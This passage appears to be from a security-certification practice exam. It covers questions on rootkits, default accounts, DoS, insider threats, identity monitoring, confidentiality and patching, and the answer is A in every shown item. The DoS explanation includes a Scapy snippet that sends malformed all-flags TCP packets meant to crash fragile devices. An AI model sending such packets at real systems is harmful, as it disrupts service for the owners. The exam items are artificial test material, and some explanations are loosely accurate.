Rootkits are malicious software designed to hide their presence on a system. They operate by modifying system kernels, drivers, or critical system libraries, allowing malware to remain invisible to traditional antivirus and monitoring tools. Rootkits can provide attackers with persistent access, allow additional malware to operate undetected, and manipulate system processes to conceal malicious activity. Their stealthy nature makes them particularly dangerous because they can maintain control over a compromised system for extended periods without triggering alerts.
Worms are self-replicating malware that spread across networks. While worms can cause rapid infection and network disruption, they do not inherently focus on remaining undetected. Worms are typically aggressive and noticeable due to their propagation, resource consumption, or alerting by security systems.
Adware displays advertisements to users and may collect browsing behavior or other data. While potentially unwanted, adware is not designed primarily for stealth or evasion. It is often detectable by standard antivirus or endpoint protection solutions.
Ransomware encrypts files and demands a ransom payment for recovery. Its behavior is overt and highly noticeable because encrypted files render systems unusable. While ransomware may include evasion techniques during delivery, its primary function is not stealth, and traditional antivirus or backup solutions are effective defenses when detection is timely.
Rootkits differ from these malware types because their goal is stealth, persistence, and hiding malicious operations from security monitoring. They often serve as a platform for further attacks, such as keylogging, credential theft, or network pivoting, while remaining undetected. Other malware types perform destructive or disruptive actions more visibly.
Therefore, rootkits are the malware type specifically designed to evade detection, making A the correct answer.
Question 15:
A penetration tester wants to identify default accounts on a network device. Which method is most effective?
A) Reviewing vendor documentation and configuration guides
B) Running a port scan
C) Checking event logs for failed logins
D) Deploying endpoint protection software
Answer: A) Reviewing vendor documentation and configuration guides
Explanation:
Vendor documentation and configuration guides provide explicit information on default accounts, default passwords, and initial configurations for network devices. By reviewing these materials, a penetration tester can identify accounts that may still exist in their default state on deployed devices. These accounts often have administrative privileges and are a frequent target for attackers. Understanding default configurations helps testers proactively assess risk, verify whether accounts have been changed, and identify potential vectors for exploitation.
Running a port scan identifies open ports and services on a device but does not reveal account credentials. While port scanning is useful for network mapping and vulnerability discovery, it cannot reliably identify default accounts unless paired with other techniques like service fingerprinting or brute-force testing.
Checking event logs for failed logins can provide insight into attempted access or suspicious activity but will not reveal accounts that have never been accessed or remain in default configuration. Event logs are reactive and require historical activity to provide useful information.
Deploying endpoint protection software focuses on detecting malware or unauthorized changes on endpoints but does not analyze network devices for default account configurations. While endpoint protection improves security posture, it is not designed to uncover default credentials on networking equipment.
Reviewing vendor documentation and configuration guides is the most effective proactive approach. It allows testers to identify high-risk accounts before exploitation attempts, ensuring a thorough assessment of potential security weaknesses. Therefore, A is the correct answer.
Question 16:
Which type of attack involves sending malformed packets to a target to trigger a system crash?
A) Denial of Service (DoS)
B) Man-in-the-middle
C) Cross-site scripting
D) Phishing
Answer: A) Denial of Service (DoS)
Explanation:
A Denial of Service (DoS) attack aims to make a system or network resource unavailable to legitimate users. One common technique involves sending malformed or specially crafted packets that exploit software vulnerabilities or buffer handling weaknesses, causing the target system to crash, freeze, or become unresponsive. This type of attack directly impacts availability, one of the core principles of information security. DoS attacks can be simple, targeting a single vulnerability, or complex, leveraging multiple vectors to overwhelm systems. Attackers may also combine DoS with other malicious activity to distract security teams while executing secondary attacks.
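As a concrete, heavily hedged illustration of what “malformed” input can look like, the Scapy sketch below builds a TCP segment with every flag set at once (a so-called Christmas tree packet), a combination no compliant stack ever sends and one that has crashed fragile devices in the past. Scapy is a third-party package, sending requires root privileges, and 192.0.2.10 is documentation address space standing in for an authorized target.

```python
from scapy.all import IP, TCP, send  # third-party: pip install scapy (run as root)

# Every TCP flag set simultaneously: FIN, SYN, RST, PSH, ACK, URG.
malformed = IP(dst="192.0.2.10") / TCP(dport=80, flags="FSRPAU")
send(malformed, count=10)  # send a handful of the non-compliant segments
```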
Man-in-the-middle (MITM) attacks intercept communication between two parties without their knowledge. The goal is to eavesdrop, modify, or inject data into ongoing communications. MITM attacks focus on confidentiality and integrity rather than availability. While they are serious and can lead to credential theft or data manipulation, they do not inherently cause a system crash or service disruption caused by malformed packets.
Cross-site scripting (XSS) attacks occur in web applications and involve injecting malicious scripts into web pages viewed by other users. The primary risk is executing unauthorized actions in the context of another user, stealing cookies, or hijacking sessions. XSS targets client-side security and does not directly crash server systems or cause widespread denial of service through malformed network packets.
Phishing is a social engineering technique used to trick users into revealing credentials or sensitive information by impersonating trusted entities. While phishing is highly effective for credential theft, it does not exploit malformed packets or directly disrupt system availability. It is entirely reliant on user behavior and does not involve network-level attacks.
DoS attacks are distinguished from these other techniques because they focus on availability disruption rather than data theft or user manipulation. The use of malformed packets to exploit a software flaw is a classic example of a DoS attack that specifically targets system stability. It tests how well a system can handle unexpected or non-compliant inputs and often serves as a wake-up call for organizations to improve resilience, patch management, and monitoring.
In conclusion, sending malformed packets to trigger a system crash is characteristic of a Denial of Service attack. Other choices—MITM, XSS, and phishing—focus on different attack objectives like confidentiality, integrity, or user deception, making A the correct answer.
Question 17:
During a red team engagement, which technique best simulates an insider threat?
A) Social engineering with internal staff
B) Network scanning from an external location
C) SQL injection on public web apps
D) Phishing external customers
Answer: A) Social engineering with internal staff
Explanation:
Social engineering with internal staff simulates insider threat behavior by targeting employees within the organization. Red team testers may impersonate trusted personnel or craft realistic pretexts to gain access to sensitive systems or information. This approach evaluates employee adherence to security policies, awareness of social engineering tactics, and the organization’s internal controls. It effectively measures how internal actors, whether malicious or negligent, could compromise security. Insider threats are often difficult to detect because they exploit legitimate access and trust relationships. Simulated engagements help organizations identify these gaps without exposing sensitive information unnecessarily.
Network scanning from an external location targets perimeter defenses and network visibility but does not emulate insider behavior. While it may identify exposed services or misconfigurations, it does not replicate the risks posed by a trusted employee or someone with legitimate internal access. External scanning focuses on technical vulnerabilities rather than human factors.
SQL injection on public web applications is a classic attack against improperly sanitized input. While it can be highly damaging, it represents an external threat vector and does not reflect the typical capabilities or behavior of insider threats. SQL injection tests for coding weaknesses rather than human risk.
Phishing external customers tests the organization’s influence on individuals outside the company and evaluates the effectiveness of user education for third parties. While important for overall security, it does not simulate insider threat scenarios because it targets external users rather than internal personnel.
Social engineering with internal staff directly addresses the key characteristics of insider threats: leveraging trust, exploiting access rights, and manipulating human behavior. It is the most accurate and practical method for testing internal risk. By monitoring how employees respond to realistic attempts to bypass procedures, red teams can provide actionable recommendations for policy enforcement, awareness training, and detection controls.
In conclusion, social engineering with internal staff is the technique that best simulates insider threats, making A the correct answer. Other approaches address external vulnerabilities and technical weaknesses rather than insider risk.
Question 18:
A company wants to monitor all Microsoft 365 accounts for suspicious login attempts, unusual behavior, and potential account compromises. Which solution is most appropriate?
A) Microsoft Defender for Identity
B) Microsoft Planner
C) Microsoft OneDrive
D) Microsoft Intune
Answer: A) Microsoft Defender for Identity
Explanation:
Microsoft Defender for Identity is a cloud-based security solution that monitors Microsoft 365 accounts and on-premises Active Directory environments. It continuously analyzes user behavior, authentication patterns, and access requests to detect anomalies, such as impossible travel, repeated failed logins, or suspicious privilege escalation attempts. By using machine learning and behavioral analytics, it identifies potential account compromises in real time and provides actionable alerts for security teams to investigate. Defender for Identity integrates with other Microsoft security tools, enabling coordinated response workflows and reducing the likelihood of undetected breaches.
Microsoft Planner is a project and task management tool that helps teams organize work and collaborate. While useful for productivity, it provides no capabilities for monitoring account behavior, detecting suspicious logins, or preventing compromise.
Microsoft OneDrive is a cloud storage platform designed for file storage, sharing, and synchronization. While it manages data access permissions, it does not actively monitor authentication events, behavioral anomalies, or potential identity threats.
Microsoft Intune primarily focuses on endpoint management, ensuring devices meet compliance standards and can enforce conditional access policies. While Intune can control which devices can access resources, it does not perform behavioral analytics on user accounts or detect unusual login activity.
Defender for Identity is purpose-built for identity protection, offering real-time monitoring, anomaly detection, and integration with Microsoft 365 and Azure AD services. It allows security teams to identify compromised accounts early, investigate threats, and respond effectively. Other solutions like Planner, OneDrive, or Intune address productivity, storage, or device management but lack the specialized capabilities required for proactive identity threat monitoring.
In conclusion, Microsoft Defender for Identity provides the most comprehensive and effective solution for monitoring suspicious account activity and detecting potential compromises in Microsoft 365 environments, making A the correct answer.
Question 19:
Which encryption characteristic ensures that encrypted data cannot be reversed without a key?
A) Confidentiality
B) Integrity
C) Non-repudiation
D) Availability
Answer: A) Confidentiality
Explanation:
Confidentiality ensures that information remains protected from unauthorized access and cannot be read without proper decryption keys. Encryption is a fundamental mechanism to achieve confidentiality, transforming plaintext into ciphertext that is unreadable without the key. This ensures that even if intercepted, sensitive data cannot be interpreted by attackers. Confidentiality is one of the core principles of information security and applies to data at rest, in transit, or in use. Strong encryption algorithms, proper key management, and secure protocols are essential to maintain confidentiality.
Integrity focuses on ensuring that data is not altered, tampered with, or corrupted during transmission or storage. Hashing algorithms and digital signatures are common techniques to verify integrity. While integrity is critical for trustworthiness, it does not address the reversibility of encrypted data or prevent unauthorized reading of the information.
Non-repudiation provides proof that a specific action, such as sending a message, cannot be denied by the originator. Digital signatures and cryptographic certificates are used to achieve non-repudiation. While important for accountability, non-repudiation does not prevent someone from decrypting data without a key.
Availability ensures that systems and information are accessible when needed. It focuses on uptime, redundancy, and fault tolerance rather than protecting data from unauthorized access or ensuring secrecy.
Confidentiality is directly related to the principle that encrypted data should remain unreadable without the appropriate key. Encryption mechanisms like AES or RSA rely on cryptographic keys to transform and restore information. Without the key, decryption is computationally infeasible, preserving the secrecy of the information. Other characteristics like integrity, non-repudiation, and availability support security but do not enforce unreadability.
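A short example with the third-party cryptography package shows the idea: the ciphertext is meaningless to anyone without the key, and the plaintext comes back only when the same key is supplied.

```python
from cryptography.fernet import Fernet  # third-party: pip install cryptography

key = Fernet.generate_key()            # the secret that confidentiality hinges on
f = Fernet(key)

ciphertext = f.encrypt(b"quarterly payroll figures")
print(ciphertext)                      # unreadable without the key
print(f.decrypt(ciphertext))           # recoverable only by a holder of the key
```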
In conclusion, confidentiality ensures that encrypted data cannot be reversed or accessed without the key, making A the correct answer.
Question 20:
Which practice is most effective for preventing attackers from exploiting known software vulnerabilities?
A) Regular patching and updates
B) Enforcing strong password policies
C) Conducting phishing awareness training
D) Deploying VPN solutions
Answer: A) Regular patching and updates
Explanation:
Regular patching and updates are critical for maintaining a secure IT environment. Software vulnerabilities are frequently discovered in operating systems, applications, and network devices. When vendors release patches, they correct security flaws, fix bugs, and close potential entry points for attackers. Applying these updates promptly reduces the attack surface and prevents attackers from exploiting known vulnerabilities. Patch management processes, including prioritization, testing, and deployment, are essential for ensuring that systems remain up to date and secure against active threats.
Enforcing strong password policies helps protect accounts from brute-force attacks, credential guessing, and some forms of unauthorized access. While important for account security, password policies do not address the exploitation of software vulnerabilities or unpatched systems. They are a preventive control for authentication rather than software flaws.
Conducting phishing awareness training educates users about social engineering and reduces the likelihood of credential theft. While beneficial for overall security awareness, training does not prevent exploitation of software vulnerabilities or system-level weaknesses. It focuses on human behavior rather than technical patch management.
Deploying VPN solutions provides encrypted communications and secure remote access. VPNs protect data in transit and provide a secure tunnel but do not fix vulnerabilities within the software itself. VPNs reduce exposure during communication but do not patch flaws or prevent exploitation of unpatched systems.
Regular patching and updates directly address the underlying cause of software exploitation. By keeping systems current with vendor releases, organizations eliminate known vulnerabilities before attackers can take advantage of them. This is a proactive, preventive security measure, whereas password policies, awareness training, and VPN deployment support complementary aspects of security.
In conclusion, regular patching and updates are the most effective practice to prevent exploitation of known software vulnerabilities, making A the correct answer.